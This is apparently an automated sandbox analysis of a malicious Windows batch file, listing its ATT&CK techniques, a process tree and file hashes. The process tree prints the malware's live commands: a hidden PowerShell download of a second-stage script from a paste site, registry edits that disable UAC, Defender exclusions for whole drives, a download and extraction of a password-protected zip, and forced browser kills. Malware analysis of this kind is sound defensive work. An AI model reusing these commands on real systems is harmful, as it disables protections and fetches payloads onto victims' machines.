f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1

Analysis

max time kernel
121s
max time network
122s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
30-12-2024 10:31

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

NEW-DRAWING-SHEET.bat
Size

41KB
MD5

6b9cf24f2b691606642bd18bf2227a62
SHA1

046ab52fa2f7fd4a6487d3ddcd58dd7f08f157bc
SHA256

f22c3a1bfa0a4f24fe236b3383df70cef2c162e1b55d7d0dfa94867d983935f1
SHA512

db5789e0e0b67eba4030d781f3fedad503bcc9f5a3d33e10a6b5081594da87bc586feeb2091739db007004422180c5f296352b9aa93e4fa6386e49babad2fc8e
SSDEEP

768:zQOoRvxAZOBu7i19ruE0qRsvAD/CPvmaFnnjZA9fhyjtA8ThOdeABXr1Rbtonrsr:UOoRvxAZOBu+19ruE0qRsvAD/CPvmaFO

Score

10^/10

defense_evasion discovery evasion execution persistence privilege_escalation trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://paste.fo/raw/a1af5a4d0301

Signatures

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	reg.exe

Blocklisted process makes network request 1 IoCs

flow	pid	Process
5	2084	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 8 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2084	powershell.exe
2880	powershell.exe
2144	powershell.exe
2304	powershell.exe
1608	powershell.exe
2508	powershell.exe
2140	powershell.exe
2492	powershell.exe

Hijack Execution Flow: Executable Installer File Permissions Weakness 1 TTPs 1 IoCs

Possible Turn off User Account Control's privilege elevation for standard users.

defense_evasion persistence privilege_escalation

Executable Installer File Permissions Weakness

T1574.005

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableInstallerDetection = "0"	reg.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs

Web Service

T1102

flow	ioc
7	raw.githubusercontent.com
9	raw.githubusercontent.com
10	raw.githubusercontent.com
15	raw.githubusercontent.com

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	IEXPLORE.EXE

Delays execution with timeout.exe 2 IoCs

evasion

pid	Process
1424	timeout.exe
2824	timeout.exe

Kills process with taskkill 12 IoCs

evasion

pid	Process
2340	taskkill.exe
1420	taskkill.exe
2404	taskkill.exe
2816	taskkill.exe
3012	taskkill.exe
3032	taskkill.exe
1536	taskkill.exe
1728	taskkill.exe
2448	taskkill.exe
1664	taskkill.exe
1224	taskkill.exe
2424	taskkill.exe

Modifies Internet Explorer settings 1 TTPs 26 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IntelliForms	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Zoom	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2"	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\GPU	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\IETld\LowMic	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\InternetRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\PageSetup	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{3DFE7931-C699-11EF-8320-E61828AB23DD} = "0"	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	IEXPLORE.EXE
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0"	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\SearchScopes	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main	iexplore.exe
Key created	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Toolbar	iexplore.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no"	iexplore.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c00000000000000010000000083ffff0083ffffffffffffffffffff2400000024000000aa04000089020000	iexplore.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-312935884-697965778-3955649944-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1"	iexplore.exe

Modifies registry key 1 TTPs 12 IoCs

Modify Registry

T1112

pid	Process
2928	reg.exe
2516	reg.exe
664	reg.exe
772	reg.exe
308	reg.exe
1412	reg.exe
2952	reg.exe
2764	reg.exe
2680	reg.exe
2684	reg.exe
3052	reg.exe
3060	reg.exe

Suspicious behavior: EnumeratesProcesses 10 IoCs

pid	Process
2084	powershell.exe
2880	powershell.exe
2880	powershell.exe
2880	powershell.exe
1608	powershell.exe
2508	powershell.exe
2140	powershell.exe
2492	powershell.exe
2144	powershell.exe
2304	powershell.exe

Suspicious use of AdjustPrivilegeToken 23 IoCs

description	pid	Process
Token: SeDebugPrivilege	2084	powershell.exe
Token: SeDebugPrivilege	2880	powershell.exe
Token: SeDebugPrivilege	1608	powershell.exe
Token: SeDebugPrivilege	2508	powershell.exe
Token: SeDebugPrivilege	2140	powershell.exe
Token: SeDebugPrivilege	2492	powershell.exe
Token: SeDebugPrivilege	2144	powershell.exe
Token: SeDebugPrivilege	2304	powershell.exe
Token: SeRestorePrivilege	1448	7z.exe
Token: 35	1448	7z.exe
Token: SeSecurityPrivilege	1448	7z.exe
Token: SeDebugPrivilege	1728	taskkill.exe
Token: SeDebugPrivilege	2340	taskkill.exe
Token: SeDebugPrivilege	2448	taskkill.exe
Token: SeDebugPrivilege	1664	taskkill.exe
Token: SeDebugPrivilege	1224	taskkill.exe
Token: SeDebugPrivilege	1420	taskkill.exe
Token: SeDebugPrivilege	2424	taskkill.exe
Token: SeDebugPrivilege	3012	taskkill.exe
Token: SeDebugPrivilege	3032	taskkill.exe
Token: SeDebugPrivilege	1536	taskkill.exe
Token: SeDebugPrivilege	2404	taskkill.exe
Token: SeDebugPrivilege	2816	taskkill.exe

Suspicious use of FindShellTrayWindow 1 IoCs

pid	Process
2796	iexplore.exe

Suspicious use of SetWindowsHookEx 6 IoCs

pid	Process
2796	iexplore.exe
2796	iexplore.exe
2532	IEXPLORE.EXE
2532	IEXPLORE.EXE
2532	IEXPLORE.EXE
2532	IEXPLORE.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2404 wrote to memory of 2552	2404	cmd.exe	31
PID 2404 wrote to memory of 2552	2404	cmd.exe	31
PID 2404 wrote to memory of 2552	2404	cmd.exe	31
PID 2552 wrote to memory of 2084	2552	cmd.exe	33
PID 2552 wrote to memory of 2084	2552	cmd.exe	33
PID 2552 wrote to memory of 2084	2552	cmd.exe	33
PID 2552 wrote to memory of 2880	2552	cmd.exe	34
PID 2552 wrote to memory of 2880	2552	cmd.exe	34
PID 2552 wrote to memory of 2880	2552	cmd.exe	34
PID 2880 wrote to memory of 2968	2880	powershell.exe	35
PID 2880 wrote to memory of 2968	2880	powershell.exe	35
PID 2880 wrote to memory of 2968	2880	powershell.exe	35
PID 2968 wrote to memory of 2928	2968	cmd.exe	37
PID 2968 wrote to memory of 2928	2968	cmd.exe	37
PID 2968 wrote to memory of 2928	2968	cmd.exe	37
PID 2968 wrote to memory of 2952	2968	cmd.exe	38
PID 2968 wrote to memory of 2952	2968	cmd.exe	38
PID 2968 wrote to memory of 2952	2968	cmd.exe	38
PID 2968 wrote to memory of 2764	2968	cmd.exe	39
PID 2968 wrote to memory of 2764	2968	cmd.exe	39
PID 2968 wrote to memory of 2764	2968	cmd.exe	39
PID 2968 wrote to memory of 2680	2968	cmd.exe	40
PID 2968 wrote to memory of 2680	2968	cmd.exe	40
PID 2968 wrote to memory of 2680	2968	cmd.exe	40
PID 2968 wrote to memory of 2684	2968	cmd.exe	41
PID 2968 wrote to memory of 2684	2968	cmd.exe	41
PID 2968 wrote to memory of 2684	2968	cmd.exe	41
PID 2552 wrote to memory of 2796	2552	cmd.exe	42
PID 2552 wrote to memory of 2796	2552	cmd.exe	42
PID 2552 wrote to memory of 2796	2552	cmd.exe	42
PID 2968 wrote to memory of 3052	2968	cmd.exe	43
PID 2968 wrote to memory of 3052	2968	cmd.exe	43
PID 2968 wrote to memory of 3052	2968	cmd.exe	43
PID 2552 wrote to memory of 1424	2552	cmd.exe	44
PID 2552 wrote to memory of 1424	2552	cmd.exe	44
PID 2552 wrote to memory of 1424	2552	cmd.exe	44
PID 2968 wrote to memory of 3060	2968	cmd.exe	45
PID 2968 wrote to memory of 3060	2968	cmd.exe	45
PID 2968 wrote to memory of 3060	2968	cmd.exe	45
PID 2968 wrote to memory of 2516	2968	cmd.exe	46
PID 2968 wrote to memory of 2516	2968	cmd.exe	46
PID 2968 wrote to memory of 2516	2968	cmd.exe	46
PID 2968 wrote to memory of 664	2968	cmd.exe	47
PID 2968 wrote to memory of 664	2968	cmd.exe	47
PID 2968 wrote to memory of 664	2968	cmd.exe	47
PID 2968 wrote to memory of 772	2968	cmd.exe	48
PID 2968 wrote to memory of 772	2968	cmd.exe	48
PID 2968 wrote to memory of 772	2968	cmd.exe	48
PID 2968 wrote to memory of 308	2968	cmd.exe	49
PID 2968 wrote to memory of 308	2968	cmd.exe	49
PID 2968 wrote to memory of 308	2968	cmd.exe	49
PID 2968 wrote to memory of 1412	2968	cmd.exe	50
PID 2968 wrote to memory of 1412	2968	cmd.exe	50
PID 2968 wrote to memory of 1412	2968	cmd.exe	50
PID 2968 wrote to memory of 1608	2968	cmd.exe	51
PID 2968 wrote to memory of 1608	2968	cmd.exe	51
PID 2968 wrote to memory of 1608	2968	cmd.exe	51
PID 2796 wrote to memory of 2532	2796	iexplore.exe	52
PID 2796 wrote to memory of 2532	2796	iexplore.exe	52
PID 2796 wrote to memory of 2532	2796	iexplore.exe	52
PID 2796 wrote to memory of 2532	2796	iexplore.exe	52
PID 2968 wrote to memory of 2508	2968	cmd.exe	53
PID 2968 wrote to memory of 2508	2968	cmd.exe	53
PID 2968 wrote to memory of 2508	2968	cmd.exe	53

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:2404
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2552
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    PowerShell -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -Command "(New-Object System.Net.WebClient).DownloadFile('https://paste.fo/raw/a1af5a4d0301', [System.IO.Path]::Combine($env:TEMP, 'BatchByloadStartHid.bat'))"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2084
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep remotesigned -Command "IEX $([System.IO.File]::ReadAllText('C:\Users\Admin\AppData\Local\Temp\NEW-DRAWING-SHEET.bat'))"
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2880
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\system32\cmd.exe" /k %TEMP%\BatchByloadStartHid.bat /
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2968
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:2928
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableInstallerDetection /t REG_DWORD /d 0 /f
        5⤵
        Hijack Execution Flow: Executable Installer File Permissions Weakness
        Modifies registry key
        
        PID:2952
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUIADesktopToggle /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2764
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableVirtualization /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2680
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableUwpStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2684
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableSecureUIAPaths /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:3052
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableFullTrustStartupTasks /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:3060
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableCursorSuppression /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:2516
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v DSCAutomationHostEnabled /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:664
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v dontdisplaylastusername /t REG_DWORD /d 0 /f
        5⤵
        Modifies registry key
        
        PID:772
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorUser /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:308
    - - C:\Windows\system32\reg.exe
        
        reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t REG_DWORD /d 0 /f
        5⤵
        UAC bypass
        Modifies registry key
        
        PID:1412
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'C:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1608
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$dPath = [System.IO.Path]::Combine($Env:USERPROFILE, 'Downloads'); Add-MpPreference -ExclusionPath $dPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2508
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath '$env:TEMP\Startup'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2140
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'D:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2492
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "Add-MpPreference -ExclusionPath 'F:\'"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2144
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        PowerShell -Command "$tempPath = $Env:TEMP; Add-MpPreference -ExclusionPath $tempPath"
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2304
- - C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" https://raw.githubusercontent.com/knkbkk212/knkbkk212/refs/heads/main/DOC.zip
    3⤵
    - Modifies Internet Explorer settings
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:2796
  - - C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2796 CREDAT:275457 /prefetch:2
      4⤵
      System Location Discovery: System Language Discovery
      Modifies Internet Explorer settings
      Suspicious use of SetWindowsHookEx
      PID:2532
- - C:\Windows\system32\timeout.exe
    timeout /t 9
    3⤵
    - Delays execution with timeout.exe
    PID:1424
- - C:\Program Files\7-Zip\7z.exe
    "C:\Program Files\7-Zip\7z.exe" x "C:\Users\Admin\Downloads\DOC.zip" -o"C:\Users\Admin\Downloads" -pFuckSyrialAndFreePsAndFreeSyria00963
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1448
- - C:\Windows\system32\timeout.exe
    timeout /t 9
    3⤵
    - Delays execution with timeout.exe
    PID:2824
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM chrome.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1728
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM firefox.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2340
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM msedge.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2448
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM iexplore.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1664
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM opera.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1224
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM safari.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1420
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM brave.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2424
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM vivaldi.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3012
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM epic.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:3032
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM yandex.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:1536
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM tor.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2404
- - C:\Windows\system32\taskkill.exe
    taskkill /F /IM CMD.exe
    3⤵
    - Kills process with taskkill
    - Suspicious use of AdjustPrivilegeToken
    PID:2816

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Hijack Execution Flow

T1574

Executable Installer File Permissions Weakness

T1574.005

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
fc2a3ec76fa2dcf2dddbe717ee1d574d

SHA1
114e97d90863a6de0a4b8f30d15610e84c123c5e

SHA256
447f90a5c99f1cad86dd71bf857f5d90abeb44425433c944a99785f01aa317ac

SHA512
54db69015142c598288e1b037386bd3c62622c6810836ae13d8a3b282e6223fbf4dc1e13af4a7748d6a08bacee9b43d4f79319f3e5d81889d26da36ab11fac4c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e747c7c70377370203681450a18afbf2

SHA1
06bede570d4f16f47c4836136b3258eda9f70fbe

SHA256
3f294975deb9c4bbb47bfb428b353b9bba7496afe88cf69b94d46294daa6d16b

SHA512
242a5041de5a5a10489ca17278a37c8434aa671947e686667abb12fee7bb9d51bee649370be14bcf71b09a5f4d40a3b36f1acf81fbce5452bc723660ba7da538

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
cd7441927bb247a6c35c086a0c5e9681

SHA1
0ce16cbd8cb350f226da5dff400f21e836fe5e29

SHA256
177ad0257726bc098a7eda72e156230cd3cc749e7d3908f02c0503adeb9b2702

SHA512
d55860f7c5b5433546fc4978cad857920a8e282a3fe6cd22e9b5da39b8e84ad6655deb8af6eb9444423dc1a811a5df74e25576fb0e7aae0f1279dbb3be57e392

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
94ec8935e459ad4154c9dc3369abfdc0

SHA1
5d90b09930c3a0346f047c5dc0c315537c67431a

SHA256
4897e5234fee2a9eb4dc295230686b45a5f11e83732eadfcee386f4a058c1f10

SHA512
f8627c934cc8685a1d2011e77c50ca86499ad509c34d4a7e3c3ae0a2e5f3a59e4605310fda6a569052bb179ed74d8d099df6427dc12e55e10c5690c7532cd3f2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
83ad08d9c5641cf0a261f1acf483c051

SHA1
80f91ac737a78ebbfd3f85a8ebd49c1ef1f37a22

SHA256
9587262983115e57c0d58d0b76206b7ac81cb378eacc8fdc623c04a1ca618be9

SHA512
e41e843644a41894cce63f6834f8b7d8855ca6b58667e9a37438027fe94a23f9ea4da620ea359eb8b52afe3809c008da793118bc3a7c3a0c3133750cb53924d2

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
41a7b00c3de2ecb5f83dfbf8cb179f7d

SHA1
1d3938ceb7c743116f852ec6ae5f02d1e1f6d4bd

SHA256
41761a76f56513908b211f0b39c914f7a541ee893b19f0cfd64d4e677150c789

SHA512
ae001a01f92d9103fcca4fa3f6ff72a9f00a00ec394a0f43c5a7f6a0819fc1bd26fea1bbac6097a6ab40b1824869ed304e9fe1ac6f0450220fc1066ea62add69

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
b9a99e77b9ffc30fd773bd66d9593bff

SHA1
e9d622c37bd6cf12bf49812cfe8e4d335113c287

SHA256
80f7cbcc815d21635123ac286d3decbccf0c5be3d39a920395670e1646d91d4c

SHA512
8fa9ec81608845073a9fcf9ee58b1b2e4e129f5ad47c09a3fcc91663f3ae661b7d28fe0a43bd7b590cc21dfe219751134e148cd1da73fb8a7f01b18da053fbd1

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
e3ec9100ae10f1bed0acfdb49439291e

SHA1
20d98aedfb3c1532c9e4bfb2f18e78764d953b87

SHA256
cfb1a6f0451b833c555207b52ac864c33ad3b933dcc0c89768ab692cbeae742f

SHA512
fb47c87e8ecd911f00f46b34691b1e261d1e8b28ba626101e4accd3c01640042f18d1aaeb48992fcd4c7c124d3e1605b3f43e3c72b81993e729a3e629a4ebe84

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
a8eda93dc6a908d5e6c8db4768301876

SHA1
a5599ff9c86cd92d9ce8076ac5bd7016ee5505a1

SHA256
00a6431236aacb7071a9bf6ceb722c8cf1637306f27760b6b88fabb3dc02c683

SHA512
76c31a4681d4c861fdf0d6f44e02ef5c46e6d17bc4dfddfbd59f5d096f7cd10b1d6c6340742b6543b94154e4edd019449cf1ad792dbf2707f8b1f7e8d6ae5fec

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
3b4d43f214bfe9c06cf33a71419c9e4e

SHA1
582d56c06e6c39326518a3d2ef39a30798e471f1

SHA256
26aa1c1a100b1c23f56e6bc56059042d69fad1242bdf295fcedd84c75f938869

SHA512
e5a0fd6f8c0543d1bb5ac884e44ea1005a245a3244099bb30796d35f5f2261aba8263d25a74efdb2d5f8e282c900aadecbfda7364629ea4cc60420eaf6628b86

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
31d83a898e8622d5929dffbe2688905e

SHA1
be2bc95e6bbade5e0c2dab1b61fbdc470dc25ba9

SHA256
d75118f415449e8dd6e01475d9bbde4a325b6f2b0c41fd15c57dc349c74f5c39

SHA512
